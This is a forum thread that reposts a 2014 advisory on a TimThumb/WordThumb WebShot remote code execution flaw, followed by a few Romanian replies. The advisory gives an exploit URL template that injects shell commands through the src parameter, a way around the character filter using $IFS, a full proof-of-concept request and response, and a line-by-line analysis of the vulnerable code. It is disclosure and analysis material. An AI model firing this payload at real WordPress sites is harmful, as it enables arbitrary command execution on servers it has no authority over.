a.linm Posted July 24, 2014 Report Share Posted July 24, 2014 ####################################################################### _ ___ _ _ ____ ____ _ _____# | | / _ \| \ | |/ ___|/ ___| / \|_ _|# | | | | | | \| | | _| | / _ \ | |# | |__| |_| | |\ | |_| | |___ / ___ \| |# |_____\___/|_| \_|\____|\____/_/ \_\_|## Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)# Affected website : a lot Wordpress Themes, Plugins, 3rd party components# Exploit Author : @u0x (Pichaya Morimoto)# Release dates : June 24, 2014## Special Thanks to 2600 Thailand group# : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio# https://www.facebook.com/groups/2600Thailand/ , Home | 2600 Thailand#########################################################################[+] Description============================================================TimThumb is a small php script for cropping, zooming and resizing webimages (jpg, png, gif). Perfect for use on blogs and other applications.Developed for use in the WordPress theme Mimbo Pro, and since used in manyother WordPress themes.TimThumb - PHP Image Resizerhttps://code.google.com/p/timthumb/The original project WordThumb 1.07 also vulnerable (https://code.google.com/p/wordthumb/)They both shared exactly the same WebShot code! And there are severalprojects that shipped with "timthumb.php", such as,@u0x (Pichaya Morimoto)Wordpress Gallery Pluginhttps://wordpress.org/plugins/wordpress-gallery-plugin/IGIT Posts Slider WidgetWordPress › IGIT Posts Slider Widget « WordPress PluginsAll themes from Themify - Drag & Drop WordPress Themes contains vulnerable "wordthumb" in"<theme-name>/themify/img.php".[+] Exploit============================================================http://<wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://<wp-website>$(<os-cmds>)** Note that OS commands payload MUST be within following character sets:[A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]** Spaces, Pipe, GT sign are not allowed.** This WebShot feature is DISABLED by default.** CutyCapt and XVFB must be installed in constants.[+] Proof-of-Concept============================================================There are couple techniques that can be used to bypass limited charsets butI will use a shell variable $IFS insteads of space in this scenario.PoC Environment:Ubuntu 14.04 LTSPHP 5.5.9Wordpress 3.9.1Themify Parallax Theme 1.5.2WordThumb 1.07Crafted Exploit:http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1Host: longcatlab.localProxy-Connection: keep-aliveCache-Control: max-age=0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, likeGecko) Chrome/35.0.1916.153 Safari/537.36Accept-Encoding: gzip,deflate,sdchAccept-Language: en-US,en;q=0.8Cookie: woocommerce_recently_viewed=9%7C12%7C16;wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;wordpress_test_cookie=WP+Cookie+check;wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685HTTP/1.1 400 Bad RequestDate: Tue, 24 Jun 2014 07:20:48 GMTServer: ApacheX-Powered-By: PHP/5.5.9-1ubuntu4X-Content-Type-Options: nosniffX-Frame-Options: sameoriginContent-Length: 3059Connection: closeContent-Type: text/html…<a href='http://www.php.net/function.getimagesize'target='_new'>getimagesize</a>( )</td><tdtitle='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr></table></font><h1>A WordThumb error has occured</h1>The following error(s) occured:<br/><ul><li>The image being resized is not a valid gif, jpg orpng.</li></ul><br /><br />Query String : webshot=1&src=http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :1.07</pre>Even it response with error messages but injected OS command has alreadybeen executed.$ ls /tmp/longcat -lha- -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat[+] Vulnerability Analysis============================================================https://timthumb.googlecode.com/svn/trunk/timthumb.phpFilename: timthumb.phpif(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT','/usr/local/bin/CutyCapt');if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');...timthumb::start(); ↠start script...public static function start(){$tim = new timthumb(); ↠create timthumb object, call __construct()...$tim->run();...public function __construct(){...$this->src = $this->param('src'); ↠set "src" variable to HTTP GET "src"parameter…if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){...$this->isURL = true; ↠prefix http/s result in isURL = true}...protected function param($property, $default = ''){if (isset ($_GET[$property])) {return $_GET[$property];...public function run(){if($this->isURL){...if($this->param('webshot')){ ↠HTTP GET "webshot" must submittedif(WEBSHOT_ENABLED){ ↠this pre-defined constant must be true...$this->serveWebshot(); ↠call webshot feature} else {...protected function serveWebshot(){...if(! is_file(WEBSHOT_CUTYCAPT)){ ↠check existing of cutycaptreturn $this->error("CutyCapt is not installed. $instr");}if(! is_file(WEBSHOT_XVFB)){ ↠check existing of xvfbreturn $this->Error("Xvfb is not installed. $instr");}...$url = $this->src;if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ↠check validURL #LoLreturn $this->error("Invalid URL supplied.");}$url =preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\@\!\$\&\'\(\)\*\+\,\;\=]+/','', $url); ↠check valid URL as specified in RFC 3986http://www.ietf.org/rfc/rfc3986.txt...if(WEBSHOT_XVFB_RUNNING){putenv('DISPLAY=:100.0');$command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"--javascript=$jsOn --java=$javaOn --plugins=$pluginsOn--js-can-open-windows=off --url=\"$url\" --out-format=$format--out=$tempfile"; ↠OS shell command injection} else {$command = "$xv --server-args=\"-screen 0,{$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout--user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn--js-can-open-windows=off --url=\"$url\" --out-format=$format--out=$tempfile"; ↠OS shell command injection}...$out = `$command`; ↠execute $command as shell command"PHP supports one execution operator: backticks (``). Note that these arenot single-quotes! PHP will attempt to execute the contents of thebackticks as a shell command." -PHP: Execution Operators - Manual"$url" is failed to escape "$()" in "$command" which is result in arbitrarycode execution. Quote Link to comment Share on other sites More sharing options...
gogusan Posted July 24, 2014 Report Share Posted July 24, 2014 tim thumbul asta de kakat intotdeauna a avut exploituri.nimeni nu mai face ceva moca si BUN in ziua de azi. Quote Link to comment Share on other sites More sharing options...
RoEx Posted July 24, 2014 Report Share Posted July 24, 2014 daca dadeai un search gaseai asta : https://rstforums.com/forum/86222-zero-day-timthumb-webshot-vulnerability.rst+ nu ai bagat intre + nu ai specificat sursa Quote Link to comment Share on other sites More sharing options...
Htich Posted July 29, 2014 Report Share Posted July 29, 2014 ... munca de chinez... Quote Link to comment Share on other sites More sharing options...
